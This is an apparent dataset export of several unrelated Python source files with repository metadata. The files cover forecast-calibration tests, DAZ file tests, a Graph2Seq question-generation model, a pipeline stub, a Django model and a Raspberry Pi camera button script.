@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end_with_additional_predictor(self):
"""Test that the expected calibrated forecast is generated, if an
additional predictor is provided."""
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube,
self.coeffs_from_mean_alt,
additional_fields=CubeList([self.altitude]),
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data, self.expected_loc_param_mean_alt
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_mean_alt
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end_with_mask(self):
"""An example end-to-end calculation, but making sure that the
areas that are masked within the landsea mask, are masked at the
end."""
# Construct a mask and encapsulate as a cube.
mask = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
mask_cube = self.current_temperature_forecast_cube[0].copy(data=mask)
# Convention for IMPROVER is that land points are ones and sea points
# are zeros in land-sea masks. In this case we want to mask sea points.
expected_mask = np.array(
[[False, True, True], [True, False, True], [True, True, False]]
)
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube,
self.coeffs_from_mean,
landsea_mask=mask_cube,
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data.data, self.expected_loc_param_mean
)
self.assertArrayEqual(calibrated_forecast_predictor.data.mask, expected_mask)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data.data, self.expected_scale_param_mean
)
self.assertArrayEqual(calibrated_forecast_var.data.mask, expected_mask)
if __name__ == "__main__":
unittest.main()
| 42.294613
| 88
| 0.690841
| 22,536
| 0.897027
| 0
| 0
| 17,265
| 0.687219
| 0
| 0
| 7,823
| 0.311388
|
2207cb5f7d7e3d98709c2a6697f808bd842caf1c
| 2,897
|
py
|
Python
|
rendaz/tests/test_daztools.py
|
veselosky/rendaz
|
c81298cb9b8f142c4748c28b7e93549a56ee248d
|
[
"Apache-2.0"
] | null | null | null |
rendaz/tests/test_daztools.py
|
veselosky/rendaz
|
c81298cb9b8f142c4748c28b7e93549a56ee248d
|
[
"Apache-2.0"
] | null | null | null |
rendaz/tests/test_daztools.py
|
veselosky/rendaz
|
c81298cb9b8f142c4748c28b7e93549a56ee248d
|
[
"Apache-2.0"
] | null | null | null |
"Test handling/parsing of various DAZ Studio files"
from pathlib import Path
from tempfile import NamedTemporaryFile
from django.apps import apps
from rendaz.daztools import (
DSONFile,
ProductMeta,
manifest_files,
supplement_product_name,
)
TEST_DIR = Path(__file__).parent
def test_read_dson_compressed():
"Test reading compressed DSON files"
fname = TEST_DIR / "Sphere-compressed.duf"
duf = DSONFile(path=str(fname))
assert duf.path.name == "Sphere-compressed.duf"
assert duf.is_compressed
assert "asset_info" in duf.dson
def test_read_dson_uncompressed():
"Test reading uncompressed DSON files"
fname = TEST_DIR / "Sphere-uncompressed.duf"
duf = DSONFile(path=str(fname))
assert duf.path.name == "Sphere-uncompressed.duf"
assert duf.is_compressed is False
assert "asset_info" in duf.dson
def test_save_dson_compressed():
"Test write round trip, read uncompressed, write compressed, read back"
fname = TEST_DIR / "Sphere-uncompressed.duf"
duf = DSONFile(path=str(fname))
out = NamedTemporaryFile(mode="wt", delete=False)
tmpname = out.name
out.close()
try:
duf.save(tmpname, compress=True)
new = DSONFile(tmpname)
assert new.is_compressed
assert "asset_info" in new.dson
finally:
Path(tmpname).unlink()
def test_save_dson_uncompressed():
"Test write round trip, read compressed, write uncompressed, read back"
fname = TEST_DIR / "Sphere-compressed.duf"
duf = DSONFile(path=str(fname))
out = NamedTemporaryFile(mode="wt", delete=False)
tmpname = out.name
out.close()
try:
duf.save(tmpname, compress=False)
new = DSONFile(tmpname)
assert new.is_compressed is False
assert "asset_info" in new.dson
finally:
Path(tmpname).unlink()
def test_productmetafile_defaults():
production = apps.get_app_config("production")
it = ProductMeta(product_id="THETHING", stem_product_name="THETHING")
assert it.product_id == "THETHING"
assert isinstance(it.cms_files, set)
assert isinstance(it.dim_manifest_files, set)
assert isinstance(it.included_files, set)
def test_manifest_files():
expected = [
"Content/People/Genesis 8 Female/Characters/Aakash.duf",
"Content/People/Genesis 8 Female/Characters/Aakash.duf.png",
"Content/Runtime/Support/DAZ_3D_60599_Aakash_HD_for_Kala_8.dsa",
"Content/Runtime/Support/DAZ_3D_60599_Aakash_HD_for_Kala_8.dsx",
"Content/Runtime/Support/DAZ_3D_60599_Aakash_HD_for_Kala_8.jpg",
]
fname = TEST_DIR / "Manifest.dsx"
actual = list(manifest_files(fname))
assert actual == expected
def test_supplement_product_name():
expected = "Aakash HD for Kala 8"
fname = TEST_DIR / "Supplement.dsx"
actual = supplement_product_name(fname)
assert actual == expected
| 29.561224
| 75
| 0.705557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 864
| 0.29824
|
2209880d39d84bdcf0ec5ef896046b892fe747ab
| 20,000
|
py
|
Python
|
src/core/models/graph2seq.py
|
talha1503/RL-based-Graph2Seq-for-NQG
|
1039e0b6231ae7029ea6e4073b1e55df5ad2e928
|
[
"Apache-2.0"
] | 100
|
2019-08-18T21:56:24.000Z
|
2022-03-31T08:54:41.000Z
|
src/core/models/graph2seq.py
|
talha1503/RL-based-Graph2Seq-for-NQG
|
1039e0b6231ae7029ea6e4073b1e55df5ad2e928
|
[
"Apache-2.0"
] | 7
|
2019-12-26T03:49:20.000Z
|
2021-11-26T19:11:19.000Z
|
src/core/models/graph2seq.py
|
talha1503/RL-based-Graph2Seq-for-NQG
|
1039e0b6231ae7029ea6e4073b1e55df5ad2e928
|
[
"Apache-2.0"
] | 17
|
2020-02-02T06:41:21.000Z
|
2022-03-09T02:53:27.000Z
|
import random
import string
from typing import Union, List
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..layers.common import EncoderRNN, DecoderRNN, dropout
from ..layers.attention import *
from ..layers.graphs import GraphNN
from ..utils.generic_utils import to_cuda, create_mask
from ..utils.constants import VERY_SMALL_NUMBER
class Graph2SeqOutput(object):
def __init__(self, encoder_outputs, encoder_state, decoded_tokens, \
loss=0, loss_value=0, enc_attn_weights=None, ptr_probs=None):
self.encoder_outputs = encoder_outputs
self.encoder_state = encoder_state
self.decoded_tokens = decoded_tokens # (out seq len, batch size)
self.loss = loss # scalar
self.loss_value = loss_value # float value, excluding coverage loss
self.enc_attn_weights = enc_attn_weights # (out seq len, batch size, src seq len)
self.ptr_probs = ptr_probs # (out seq len, batch size)
class Graph2Seq(nn.Module):
def __init__(self, config, word_embedding, word_vocab):
"""
:param word_vocab: mainly for info about special tokens and word_vocab size
:param config: model hyper-parameters
:param max_dec_steps: max num of decoding steps (only effective at test time, as during
training the num of steps is determined by the `target_tensor`); it is
safe to change `self.max_dec_steps` as the network architecture is
independent of src/tgt seq lengths
Create the graph2seq model; its encoder and decoder will be created automatically.
"""
super(Graph2Seq, self).__init__()
self.name = 'Graph2Seq'
self.device = config['device']
self.word_dropout = config['word_dropout']
self.edge_dropout = config['edge_dropout']
self.bert_dropout = config['bert_dropout']
self.word_vocab = word_vocab
self.vocab_size = len(word_vocab)
self.f_case = config['f_case']
self.f_pos = config['f_pos']
self.f_ner = config['f_ner']
self.f_freq = config['f_freq']
self.f_dep = config['f_dep']
self.f_ans = config['f_ans']
self.dan_type = config.get('dan_type', 'all')
self.max_dec_steps = config['max_dec_steps']
self.rnn_type = config['rnn_type']
self.enc_attn = config['enc_attn']
self.enc_attn_cover = config['enc_attn_cover']
self.dec_attn = config['dec_attn']
self.pointer = config['pointer']
self.pointer_loss_ratio = config['pointer_loss_ratio']
self.cover_loss = config['cover_loss']
self.cover_func = config['cover_func']
self.message_function = config['message_function']
self.use_bert = config['use_bert']
self.use_bert_weight = config['use_bert_weight']
self.use_bert_gamma = config['use_bert_gamma']
self.finetune_bert = config.get('finetune_bert', None)
bert_dim = (config['bert_dim'] if self.use_bert else 0)
enc_hidden_size = config['rnn_size']
if config['dec_hidden_size']:
dec_hidden_size = config['dec_hidden_size']
if self.rnn_type == 'lstm':
self.enc_dec_adapter = nn.ModuleList([nn.Linear(enc_hidden_size, dec_hidden_size) for _ in range(2)])
else:
self.enc_dec_adapter = nn.Linear(enc_hidden_size, dec_hidden_size)
else:
dec_hidden_size = enc_hidden_size
self.enc_dec_adapter = None
enc_input_dim = config['word_embed_dim']
self.word_embed = word_embedding
if config['fix_word_embed']:
print('[ Fix word embeddings ]')
for param in self.word_embed.parameters():
param.requires_grad = False
self.edge_embed = nn.Embedding(config['num_edge_types'], config['edge_embed_dim'], padding_idx=0)
if self.f_case:
self.case_embed = nn.Embedding(3, config['case_embed_dim'], padding_idx=0)
enc_input_dim += config['case_embed_dim']
if self.f_pos:
self.pos_embed = nn.Embedding(config['num_features_f_pos'], config['pos_embed_dim'], padding_idx=0)
enc_input_dim += config['pos_embed_dim']
if self.f_ner:
self.ner_embed = nn.Embedding(config['num_features_f_ner'], config['ner_embed_dim'], padding_idx=0)
enc_input_dim += config['ner_embed_dim']
if self.f_freq:
self.freq_embed = nn.Embedding(4, config['freq_embed_dim'], padding_idx=0)
enc_input_dim += config['freq_embed_dim']
if self.f_dep:
self.edge_embed = nn.Embedding(config['num_edge_types'], config['edge_embed_dim'], padding_idx=0)
enc_input_dim += config['edge_embed_dim']
if self.f_ans and self.dan_type in ('all', 'word'):
enc_input_dim += config['word_embed_dim']
if self.use_bert:
enc_input_dim += config['bert_dim']
if self.use_bert and self.use_bert_weight:
num_bert_layers = config['bert_layer_indexes'][1] - config['bert_layer_indexes'][0]
self.logits_bert_layers = nn.Parameter(nn.init.xavier_uniform_(torch.Tensor(1, num_bert_layers)))
if self.use_bert_gamma:
self.gamma_bert_layers = nn.Parameter(nn.init.constant_(torch.Tensor(1, 1), 1.))
config['gl_input_size'] = enc_input_dim
self.ctx_rnn_encoder = EncoderRNN(enc_input_dim, enc_hidden_size, bidirectional=config['enc_bidi'], num_layers=config['num_enc_rnn_layers'], rnn_type=self.rnn_type,
rnn_dropout=config['enc_rnn_dropout'], device=self.device)
# Deep answer alignment
if self.f_ans:
if self.dan_type in ('all', 'word'):
self.ctx2ans_attn_l1 = Context2AnswerAttention(config['word_embed_dim'], config['hidden_size'])
if self.dan_type in ('all', 'hidden'):
self.ans_rnn_encoder = EncoderRNN(config['word_embed_dim'] + bert_dim, enc_hidden_size, bidirectional=config['enc_bidi'], num_layers=config['num_enc_rnn_layers'], rnn_type=self.rnn_type,
rnn_dropout=config['enc_rnn_dropout'], device=self.device)
self.ctx2ans_attn_l2 = Context2AnswerAttention(config['word_embed_dim'] + config['hidden_size'] + bert_dim, config['hidden_size'])
self.ctx_rnn_encoder_l2 = EncoderRNN(2 * enc_hidden_size, enc_hidden_size, bidirectional=config['enc_bidi'], num_layers=config['num_enc_rnn_layers'], rnn_type=self.rnn_type,
rnn_dropout=config['enc_rnn_dropout'], device=self.device)
print('[ Using Deep Answer Alignment Network: {} ]'.format(self.dan_type))
self.graph_encoder = GraphNN(config)
self.decoder = DecoderRNN(self.vocab_size, config['word_embed_dim'], dec_hidden_size, rnn_type=self.rnn_type,
enc_attn=config['enc_attn'], dec_attn=config['dec_attn'],
pointer=config['pointer'], out_embed_size=config['out_embed_size'],
tied_embedding=self.word_embed if config['tie_embed'] else None,
in_drop=config['dec_in_dropout'], rnn_drop=config['dec_rnn_dropout'],
out_drop=config['dec_out_dropout'], enc_hidden_size=enc_hidden_size, device=self.device)
def filter_oov(self, tensor, ext_vocab_size):
"""Replace any OOV index in `tensor` with UNK"""
if ext_vocab_size and ext_vocab_size > self.vocab_size:
result = tensor.clone()
result[tensor >= self.vocab_size] = self.word_vocab.UNK
return result
return tensor
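# Illustrative note (numbers are hypothetical, not from the original code):
# with self.vocab_size == 50000 and ext_vocab_size == 50010, an index such as
# 50003 (a source word copied into the extended vocab) is mapped back to
# word_vocab.UNK here, since the embedding table only covers the base vocab.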
def get_coverage_vector(self, enc_attn_weights):
"""Combine the past attention weights into one vector"""
if self.cover_func == 'max':
coverage_vector, _ = torch.max(torch.cat(enc_attn_weights), dim=0)
elif self.cover_func == 'sum':
coverage_vector = torch.sum(torch.cat(enc_attn_weights), dim=0)
else:
raise ValueError('Unrecognized cover_func: ' + self.cover_func)
return coverage_vector
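# Worked example (illustrative): for one batch element over a 2-token source,
# past attention steps [0.2, 0.8] and [0.5, 0.5] give a coverage vector of
# [0.7, 1.3] with cover_func == 'sum', or [0.5, 0.8] with cover_func == 'max'.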
def forward(self, ex, target_tensor=None, criterion=None, criterion_reduction=True, criterion_nll_only=False, \
rl_loss=False, *, forcing_ratio=0, partial_forcing=True, \
ext_vocab_size=None, sample=False, saved_out: Graph2SeqOutput=None, \
visualize: bool=None, include_cover_loss: bool=False) -> Graph2SeqOutput:
"""
:param ex: batch dict; `ex['context']` is a tensor of word indices
(batch size, src seq len) and `ex['context_lens']` holds the input lengths
(see explanation in `EncoderRNN`)
:param target_tensor: tensor of word indices, (batch size, tgt seq len)
:param criterion: the loss function; if set, loss will be returned
:param forcing_ratio: see explanation in `Params` (requires `target_tensor`, training only)
:param partial_forcing: see explanation in `Params` (training only)
:param ext_vocab_size: see explanation in `DecoderRNN`
:param sample: if True, the returned `decoded_tokens` will be based on random sampling instead
of greedily selecting the token of the highest probability at each step
:param saved_out: the output of this function in a previous run; if set, the encoding step will
be skipped and we reuse the encoder states saved in this object
:param visualize: whether to return data for attention and pointer visualization; if None,
return if no `criterion` is provided
:param include_cover_loss: whether to include coverage loss in the returned `loss_value`
Run the graph2seq model for training or testing.
"""
input_tensor = ex['context']
input_lengths = ex['context_lens']
batch_size, input_length = input_tensor.shape
input_mask = create_mask(input_lengths, input_length, self.device)
log_prob = not (sample or self.decoder.pointer) # don't apply log too soon in these cases
if visualize is None:
visualize = criterion is None
if visualize and not (self.enc_attn or self.pointer):
visualize = False # nothing to visualize
if target_tensor is None:
target_length = self.max_dec_steps
target_mask = None
else:
target_tensor = target_tensor.transpose(1, 0)
target_length = target_tensor.size(0)
target_mask = create_mask(ex['target_lens'], target_length, self.device)
if forcing_ratio == 1:
# if fully teacher-forced, it may be possible to eliminate the for-loop over decoder steps
# for generality, this optimization is not investigated
use_teacher_forcing = True
elif forcing_ratio > 0:
if partial_forcing:
use_teacher_forcing = None # decide later individually in each step
else:
use_teacher_forcing = random.random() < forcing_ratio
else:
use_teacher_forcing = False
if saved_out: # reuse encoder states of a previous run
encoder_outputs = saved_out.encoder_outputs
encoder_state = saved_out.encoder_state
assert input_length == encoder_outputs.size(0)
assert batch_size == encoder_outputs.size(1)
else: # run the encoder
# encoder_embedded: (batch size, input len, embed size)
encoder_embedded = self.word_embed(self.filter_oov(input_tensor, ext_vocab_size))
encoder_embedded = dropout(encoder_embedded, self.word_dropout, shared_axes=[-2], training=self.training)
enc_input_cat = [encoder_embedded]
if self.f_case:
case_features = self.case_embed(ex['context_case'])
enc_input_cat.append(case_features)
if self.f_pos:
pos_features = self.pos_embed(ex['context_pos'])
enc_input_cat.append(pos_features)
if self.f_ner:
ner_features = self.ner_embed(ex['context_ner'])
enc_input_cat.append(ner_features)
if self.f_freq:
freq_features = self.freq_embed(ex['context_freq'])
enc_input_cat.append(freq_features)
if self.f_dep:
dep_features = self.edge_embed(ex['context_dep'])
enc_input_cat.append(dep_features)
if self.f_ans:
answer_tensor = ex['answers']
answer_lengths = ex['answer_lens']
ans_mask = create_mask(answer_lengths, answer_tensor.size(1), self.device)
ans_embedded = self.word_embed(self.filter_oov(answer_tensor, ext_vocab_size))
ans_embedded = dropout(ans_embedded, self.word_dropout, shared_axes=[-2], training=self.training)
enc_answer_cat = [ans_embedded]
if self.dan_type in ('all', 'word'):
# Align answer info to passage at the word level
ctx_aware_ans_emb = self.ctx2ans_attn_l1(encoder_embedded, ans_embedded, ans_embedded, ans_mask)
enc_input_cat.append(ctx_aware_ans_emb)
if self.use_bert:
context_bert = ex['context_bert']
if not self.finetune_bert:
assert context_bert.requires_grad == False
if self.use_bert_weight:
weights_bert_layers = torch.softmax(self.logits_bert_layers, dim=-1)
if self.use_bert_gamma:
weights_bert_layers = weights_bert_layers * self.gamma_bert_layers
context_bert = torch.mm(weights_bert_layers, context_bert.view(context_bert.size(0), -1)).view(context_bert.shape[1:])
context_bert = dropout(context_bert, self.bert_dropout, shared_axes=[-2], training=self.training)
enc_input_cat.append(context_bert)
if self.f_ans and self.dan_type in ('all', 'hidden'):
answer_bert = ex['answer_bert']
if not self.finetune_bert:
assert answer_bert.requires_grad == False
answer_bert = torch.mm(weights_bert_layers, answer_bert.view(answer_bert.size(0), -1)).view(answer_bert.shape[1:])
answer_bert = dropout(answer_bert, self.bert_dropout, shared_axes=[-2], training=self.training)
enc_answer_cat.append(answer_bert)
raw_input_vec = torch.cat(enc_input_cat, -1)
encoder_outputs = self.ctx_rnn_encoder(raw_input_vec, input_lengths)[0].transpose(0, 1)
if self.f_ans and self.dan_type in ('all', 'hidden'):
# Align answer info to passage at the hidden state level
enc_answer_cat = torch.cat(enc_answer_cat, -1)
ans_encoder_outputs = self.ans_rnn_encoder(enc_answer_cat, answer_lengths)[0].transpose(0, 1)
enc_cat_l2 = torch.cat([encoder_embedded, encoder_outputs], -1)
ans_cat_l2 = torch.cat([ans_embedded, ans_encoder_outputs], -1)
if self.use_bert:
enc_cat_l2 = torch.cat([enc_cat_l2, context_bert], -1)
ans_cat_l2 = torch.cat([ans_cat_l2, answer_bert], -1)
ctx_aware_ans_emb = self.ctx2ans_attn_l2(enc_cat_l2, \
ans_cat_l2, ans_encoder_outputs, ans_mask)
encoder_outputs = self.ctx_rnn_encoder_l2(torch.cat([encoder_outputs, ctx_aware_ans_emb], -1), \
input_lengths)[0].transpose(0, 1)
input_graphs = ex['context_graphs']
if self.message_function == 'edge_mm':
edge_vec = input_graphs['edge_features']
else:
edge_vec = self.edge_embed(input_graphs['edge_features'])
node_embedding, graph_embedding = self.graph_encoder(encoder_outputs, \
edge_vec, (input_graphs['node2edge'], input_graphs['edge2node']), \
node_mask=input_mask, raw_node_vec=raw_input_vec)
encoder_outputs = node_embedding
encoder_state = (graph_embedding, graph_embedding) if self.rnn_type == 'lstm' else graph_embedding
# initialize return values
r = Graph2SeqOutput(encoder_outputs, encoder_state,
torch.zeros(target_length, batch_size, dtype=torch.long))
if visualize:
r.enc_attn_weights = torch.zeros(target_length, batch_size, input_length)
if self.pointer:
r.ptr_probs = torch.zeros(target_length, batch_size)
if self.enc_dec_adapter is None:
decoder_state = encoder_state
else:
if self.rnn_type == 'lstm':
decoder_state = tuple([self.enc_dec_adapter[i](x) for i, x in enumerate(encoder_state)])
else:
decoder_state = self.enc_dec_adapter(encoder_state)
decoder_hiddens = []
enc_attn_weights = []
enc_context = None
dec_prob_ptr_tensor = []
decoder_input = to_cuda(torch.tensor([self.word_vocab.SOS] * batch_size), self.device)
for di in range(target_length):
decoder_embedded = self.word_embed(self.filter_oov(decoder_input, ext_vocab_size))
decoder_embedded = dropout(decoder_embedded, self.word_dropout, shared_axes=[-2], training=self.training)
if enc_attn_weights:
coverage_vector = self.get_coverage_vector(enc_attn_weights)
else:
coverage_vector = None
decoder_output, decoder_state, dec_enc_attn, dec_prob_ptr, enc_context = \
self.decoder(decoder_embedded, decoder_state, encoder_outputs,
torch.cat(decoder_hiddens) if decoder_hiddens else None, coverage_vector,
input_mask=input_mask,
encoder_word_idx=input_tensor, ext_vocab_size=ext_vocab_size,
log_prob=log_prob,
prev_enc_context=enc_context)
dec_prob_ptr_tensor.append(dec_prob_ptr)
if self.dec_attn:
decoder_hiddens.append(decoder_state[0] if self.rnn_type == 'lstm' else decoder_state)
# save the decoded tokens
if not sample:
_, top_idx = decoder_output.data.topk(1) # top_idx shape: (batch size, k=1)
else:
prob_distribution = torch.exp(decoder_output) if log_prob else decoder_output
top_idx = torch.multinomial(prob_distribution, 1)
top_idx = top_idx.squeeze(1).detach() # detach from history as input
r.decoded_tokens[di] = top_idx
# decide the next input
if use_teacher_forcing or (use_teacher_forcing is None and random.random() < forcing_ratio):
decoder_input = target_tensor[di] # teacher forcing
else:
decoder_input = top_idx
# compute loss
if criterion:
if target_tensor is None:
gold_standard = top_idx # for sampling
else:
gold_standard = target_tensor[di] if not rl_loss else decoder_input
if not log_prob:
decoder_output = torch.log(decoder_output + VERY_SMALL_NUMBER) # necessary for NLLLoss
if criterion_reduction:
nll_loss = criterion(decoder_output, gold_standard)
r.loss += nll_loss
r.loss_value += nll_loss.item()
else:
nll_loss = F.nll_loss(decoder_output, gold_standard, ignore_index=self.word_vocab.PAD, reduction='none')
r.loss += nll_loss
r.loss_value += nll_loss
# update attention history and compute coverage loss
if self.enc_attn_cover or (criterion and self.cover_loss > 0):
if not criterion_nll_only and coverage_vector is not None and criterion and self.cover_loss > 0:
if criterion_reduction:
coverage_loss = torch.sum(torch.min(coverage_vector, dec_enc_attn)) / batch_size * self.cover_loss
r.loss += coverage_loss
if include_cover_loss: r.loss_value += coverage_loss.item()
else:
coverage_loss = torch.sum(torch.min(coverage_vector, dec_enc_attn), dim=-1) * self.cover_loss
r.loss += coverage_loss
if include_cover_loss: r.loss_value += coverage_loss
enc_attn_weights.append(dec_enc_attn.unsqueeze(0))
# save data for visualization
if visualize:
r.enc_attn_weights[di] = dec_enc_attn.data
if self.pointer:
r.ptr_probs[di] = dec_prob_ptr.squeeze(1).data
# compute pointer network loss
if not criterion_nll_only and criterion and self.pointer_loss_ratio > 0 and target_tensor is not None:
dec_prob_ptr_tensor = torch.cat(dec_prob_ptr_tensor, -1)
pointer_loss = F.binary_cross_entropy(dec_prob_ptr_tensor, ex['target_copied'], reduction='none')
if criterion_reduction:
pointer_loss = torch.sum(pointer_loss * target_mask) / batch_size * self.pointer_loss_ratio
r.loss += pointer_loss
r.loss_value += pointer_loss.item()
else:
pointer_loss = torch.sum(pointer_loss * target_mask, dim=-1) * self.pointer_loss_ratio
r.loss += pointer_loss
r.loss_value += pointer_loss
return r
| 46.948357
| 194
| 0.6892
| 19,634
| 0.9817
| 0
| 0
| 0
| 0
| 0
| 0
| 4,337
| 0.21685
|
220aabb343a26ce1e8cadcc4df4a8b3a8adedfdb
| 2,939
|
py
|
Python
|
towhee/engine/pipeline.py
|
jeffoverflow/towhee
|
c576d22a4cdfc3909a3323b0d1decab87e83d26c
|
[
"Apache-2.0"
] | null | null | null |
towhee/engine/pipeline.py
|
jeffoverflow/towhee
|
c576d22a4cdfc3909a3323b0d1decab87e83d26c
|
[
"Apache-2.0"
] | null | null | null |
towhee/engine/pipeline.py
|
jeffoverflow/towhee
|
c576d22a4cdfc3909a3323b0d1decab87e83d26c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Callable
from towhee.engine.graph_context import GraphContext
from towhee.dag.graph_repr import GraphRepr
from towhee.dataframe.dataframe import DFIterator
class Pipeline:
"""
The runtime pipeline context
"""
def __init__(self, engine: 'Engine', graph_repr: GraphRepr, parallelism: int = 1) -> None:
"""
Args:
engine: the local engine to drive the Pipeline
graph_repr: the graph representation
parallelism: how many rows of inputs to be processed concurrently
"""
self._engine = engine
self._graph_repr = graph_repr
self._parallelism = parallelism
def build(self):
"""
Create GraphContexts and set up input iterators.
"""
raise NotImplementedError
def run(self, inputs: list) -> DFIterator:
"""
The Pipeline's main loop
Args:
inputs: the input data, organized as a list of DataFrames, fed
to the Pipeline.
"""
# while we still have pipeline inputs:
# input = inputs.next()
# for g in graph contexts:
# if g.is_idle:
# g.start_op.inputs = input
# break
# if all graphs contexts are busy:
# wait for notification from _notify_run_loop
raise NotImplementedError
def on_start(self, handler: Callable):
"""
Set a custom handler that is called before the execution of the graph.
"""
self._on_start_handler = handler
raise NotImplementedError
def on_finish(self, handler: Callable):
"""
Set a custom handler that is called after the execution of the graph.
"""
self._on_finish_handler = handler
raise NotImplementedError
def _organize_outputs(self, graph_ctx: GraphContext):
"""
on_finish handler passed to a GraphContext. The handler will organize the
GraphContext's output into Pipeline's outputs.
"""
raise NotImplementedError
def _notify_run_loop(self, graph_ctx: GraphContext):
"""
on_finish handler passed to a GraphContext. The handler will notify the run loop
that a GraphContext is in idle state.
"""
raise NotImplementedError
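# A minimal sketch of the run loop described in `run` above (illustrative only;
# the attributes assumed here -- `_graph_ctxs`, `is_idle`, `start_op.inputs`,
# `_wait_for_notification` -- mirror the pseudocode comments and are not a
# confirmed towhee API):
#
# def _run_loop(self, inputs):
#     for row in inputs:
#         ctx = next((g for g in self._graph_ctxs if g.is_idle), None)
#         while ctx is None:
#             self._wait_for_notification()  # woken by _notify_run_loop
#             ctx = next((g for g in self._graph_ctxs if g.is_idle), None)
#         ctx.start_op.inputs = row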
| 33.397727
| 92
| 0.638312
| 2,195
| 0.746853
| 0
| 0
| 0
| 0
| 0
| 0
| 1,834
| 0.624022
|
220ccdab937624a53d838d42a5f734ee87cb22a8
| 744
|
py
|
Python
|
portfolio/models.py
|
MrInternauta/Python-Django-Portafolio-web-administrable
|
0df6f76cb5bdc2f28eb691d21f3592f7f082ce80
|
[
"MIT"
] | null | null | null |
portfolio/models.py
|
MrInternauta/Python-Django-Portafolio-web-administrable
|
0df6f76cb5bdc2f28eb691d21f3592f7f082ce80
|
[
"MIT"
] | null | null | null |
portfolio/models.py
|
MrInternauta/Python-Django-Portafolio-web-administrable
|
0df6f76cb5bdc2f28eb691d21f3592f7f082ce80
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Project(models.Model):
title = models.CharField(max_length = 200, verbose_name = "Titulo")
description = models.TextField(verbose_name="Descripcion")
image = models.ImageField(verbose_name="Imagen", upload_to = "projects")
link = models.URLField(null=True, blank=True, verbose_name="Direccion web")
created = models.DateTimeField(auto_now_add=True, verbose_name="Fecha de creacion")
updated = models.DateTimeField(auto_now=True, verbose_name="Fecha de actualizacion")
class Meta:
verbose_name = 'proyecto'
verbose_name_plural = 'proyectos'
ordering = ['-created']
def __str__(self):
return self.title
| 43.764706
| 89
| 0.701613
| 684
| 0.919355
| 0
| 0
| 0
| 0
| 0
| 0
| 155
| 0.208333
|
220d1b0d3abc6c0db8d6bd13778e65f09dbb4290
| 231
|
py
|
Python
|
src/notifications/tests.py
|
kullo/webconfig
|
470839ed77fda11634d4e14a89bb5e7894aa707d
|
[
"BSD-3-Clause"
] | null | null | null |
src/notifications/tests.py
|
kullo/webconfig
|
470839ed77fda11634d4e14a89bb5e7894aa707d
|
[
"BSD-3-Clause"
] | null | null | null |
src/notifications/tests.py
|
kullo/webconfig
|
470839ed77fda11634d4e14a89bb5e7894aa707d
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2015–2020 Kullo GmbH
#
# This source code is licensed under the 3-clause BSD license. See LICENSE.txt
# in the root directory of this source tree for details.
from django.test import TestCase
# Create your tests here.
| 28.875
| 78
| 0.774892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 194
| 0.832618
|
220da7c8db31ca8e3ea4491d39c1e1bb6b8b46fe
| 1,018
|
py
|
Python
|
examples/cam.py
|
jtme/button-shim
|
19b80a236866fad068e6d3aeb643a1270d6ae934
|
[
"MIT"
] | null | null | null |
examples/cam.py
|
jtme/button-shim
|
19b80a236866fad068e6d3aeb643a1270d6ae934
|
[
"MIT"
] | null | null | null |
examples/cam.py
|
jtme/button-shim
|
19b80a236866fad068e6d3aeb643a1270d6ae934
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import signal
import buttonshim
print("""
Button SHIM: cam.py
Takes a photo on button press.
Press Ctrl+C to exit.
""")
import subprocess
@buttonshim.on_press(buttonshim.BUTTON_A)
def button_a(button, pressed):
buttonshim.set_pixel(0x94, 0x00, 0xd3)
# getstatusoutput returns (exit_status, output); a non-zero status means failure
status, output = subprocess.getstatusoutput("raspistill -w 320 -h 240 -o IMG/snap.jpg")
if status != 0:
print("error occurred:", status, output)
else:
print(output)
@buttonshim.on_press(buttonshim.BUTTON_B)
def button_b(button, pressed):
buttonshim.set_pixel(0x00, 0x00, 0xff)
@buttonshim.on_press(buttonshim.BUTTON_C)
def button_c(button, pressed):
buttonshim.set_pixel(0x00, 0xff, 0x00)
@buttonshim.on_press(buttonshim.BUTTON_D)
def button_d(button, pressed):
buttonshim.set_pixel(0xff, 0xff, 0x00)
@buttonshim.on_press(buttonshim.BUTTON_E)
def button_e(button, pressed):
buttonshim.set_pixel(0xff, 0x00, 0x00)
signal.pause()
| 19.960784
| 74
| 0.681729
| 0
| 0
| 0
| 0
| 795
| 0.780943
| 0
| 0
| 160
| 0.157171
|
220e0c7e4d7e7b9e561c692a325977f16ecf70b4
| 153
|
py
|
Python
|
built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/vega/algorithms/nas/sm_nas/mmdet_meta_cfgs/bbox_head/__init__.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | 12
|
2020-12-13T08:34:24.000Z
|
2022-03-20T15:17:17.000Z
|
built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/vega/algorithms/nas/sm_nas/mmdet_meta_cfgs/bbox_head/__init__.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
